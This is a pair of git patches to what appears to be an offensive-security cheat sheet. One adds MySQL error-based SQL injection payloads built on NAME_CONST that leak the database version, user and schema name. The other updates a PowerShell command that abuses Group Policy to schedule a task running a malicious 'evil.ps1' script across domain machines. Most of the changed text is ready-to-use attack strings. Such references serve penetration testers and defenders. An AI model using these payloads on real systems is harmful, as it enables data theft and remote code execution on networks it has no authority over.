From a568270b15e3676ef9189d45cc7617df645508d0 Mon Sep 17 00:00:00 2001
From: Alex G <24873615+Zeecka@users.noreply.github.com>
Date: Thu, 16 Dec 2021 12:11:25 +0100
Subject: [PATCH 1/2] Add NAME_CONST for MySQL Error based injection

---
 SQL Injection/MySQL Injection.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 1764a132..7edb7e20 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -220,6 +220,16 @@ Works with `MySQL >= 5.1`
 ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
 
+### MYSQL Error Based - NAME_CONST function (only for constants)
+
+Works with `MySQL >= 5.0`
+
+```sql
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)--
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
+```
+
 ## MYSQL Blind
 
 ### MYSQL Blind with substring equivalent

From a430cfcc4ea0a43ed07f3e8fe2af01cfab63ca96 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 22 Dec 2021 16:09:07 +0100
Subject: [PATCH 2/2] update PowerGPOAbuse task command

---
 Methodology and Resources/Active Directory Attack.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c9644aa3..493a36e8 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -1021,7 +1021,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity
 PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
 
 # Create an immediate task
-PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator
+PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO'
 ```
 
 #### Abuse GPO with pyGPOAbuse
@@ -3347,4 +3347,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
 * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
 * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
-* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
\ No newline at end of file
+* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)